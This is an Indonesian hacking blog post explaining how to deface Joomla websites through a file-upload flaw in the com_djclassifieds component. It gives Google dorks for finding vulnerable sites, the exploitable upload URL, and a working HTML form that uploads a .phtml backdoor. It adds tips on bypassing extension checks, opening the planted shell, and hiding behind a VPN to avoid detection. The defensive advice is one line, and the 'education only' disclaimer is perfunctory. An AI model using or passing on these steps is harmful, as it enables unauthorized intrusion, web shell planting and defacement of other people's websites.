Cara Merubah Tampilan Website Dengan Metode com_djclassifieds
Hacking, imaginationman.eu.org - Hallo... sobat unix, kali ini saya akan menulis artikel tentang bagaimana merubah tampilan website yang terinstall joomla dengan metode com_djclassifieds. Yang kita tau bahwa com_djclassifieds adalah salah satu plugin yang ada di CMS Joomla selain com_user yang pernah saya tulis di artikel sebelumnya juga.yaitu cara deface dengan com_user.
Cara mendeface atau merubah tampilan website dengan metode com_djclassifieds, sebetulnya metodi ini lebih ke upload file backdoor kalian ke target website dengan memanfaatkan function upload pada plugin com_djclassifieds.
Lalu bagaimana cara memperbaikinnya supaya para hacker atau orang jail lainnya tidak bisa masuk? Mungkin ini cara yang biasa dilakukan atau di kasih tau caranya diluar sana, tapi ini pasti sangat penting yaitu update plugin kalian atau jika kalian tidak mau update ubahlah file upload /tmp/djupload ke tempat lain. Dengan cara itu kita bisa menghindari yang namanya website kita ter hack atau di bobol sama orang iseng.
Cara ini dilansir dari DotNaonWeh yaitu menjelaskan bagaimana cara Deface Metode com_djclassifieds File Upload, dengan cara itu kalian bisa jadi hacker dengan mudah hihi...
Bahan-bahannya
- Backdooor- Dork
- Exploit
- CSRF
Langkah -langkah
- Pertama-tama kalian haru punya backdoor untuk masuk web target kalian, backdoornya bisa kalian dapatkan disini
- Selanjutnya jika kalian sudah punya backdoornya, kalian bisa lanjutkan tahap selanjutnya yaitu lakukan dorking, atau mencari katakunci di google untuk mendapatkan website yang vuln atau bisa kita masukin. Contoh dork com_djclassifieds inurl:/com_djclassifieds dan inurl:/components/com_djclassifieds
- Setelah itu kalian lakukan exploit atau pengecekan pada target apakah target tersebut bisa kita masukin. Ini exploitnya /index.php?option=com_djclassifieds&task=upload&tmpl=component dan jika bisa atau vuln bisa diliat pada gambar dibawah
- Jika sesuai tampilan target sobat setelah di explit seperti di atas maka langkah selanjutnya yaitu melakukan upload file menggunakan CSRF. untuk bisa kalian liat dibawah
<html><body><form method="post" action="https://www.site.lu/index.php?option=com_djclassifieds&task=upload&tmpl=component" enctype="multipart/form-data"><input type="file" name="file"/><input type="hidden" name="name" value="mini.phtml" /><input type="submit" value="submit"/></form></body></html>
action = "site/target/web"
value = "namafilekalian.phtml"
nama file kalian bisa dikreasikan supaya bisa diterima di sistem, dengan cara bypass ext
- Jika, CSRFnya sudah kalian seusaikan dengan kebutuhan kalian maka CSRFnya tinggal kalian jalankan dengan cara buka melalui Google Chrome ataupun Mozilla Firefox. Jika sudah kalian tinggal pilih file yang akan kalian upload, tapi inget harus sesuai dengan value yang ada di CSRF kalian tadi.
- Jika berhasil maka akan seperti gambar dibawah ini.
- Setelah berhasil kita tinggal akses file backdoor yang kita upload tadi deh. Caranya dengan buka /tmp/djupload/namaValueCSRF.phtml
Nah mungkin itu cara merubah tampilan website dengan metode com_djclassifieds, sebelum beraksi saya sarankan kalian pake vpn berbayar yah atau vpn gratis disini. Kenapa harus pake VPN? Karna supaya tidak terdetek ip kalian hihi...
Terimakasih kepada DotNaonWeh yang terlah memberikan informasih seputar ini, gunakanlah ini sebagai edukasi saja ya, jangan disalah gunakan. Karna resikonya berat sobat hihi...
Terimakasih kepada DotNaonWeh yang terlah memberikan informasih seputar ini, gunakanlah ini sebagai edukasi saja ya, jangan disalah gunakan. Karna resikonya berat sobat hihi...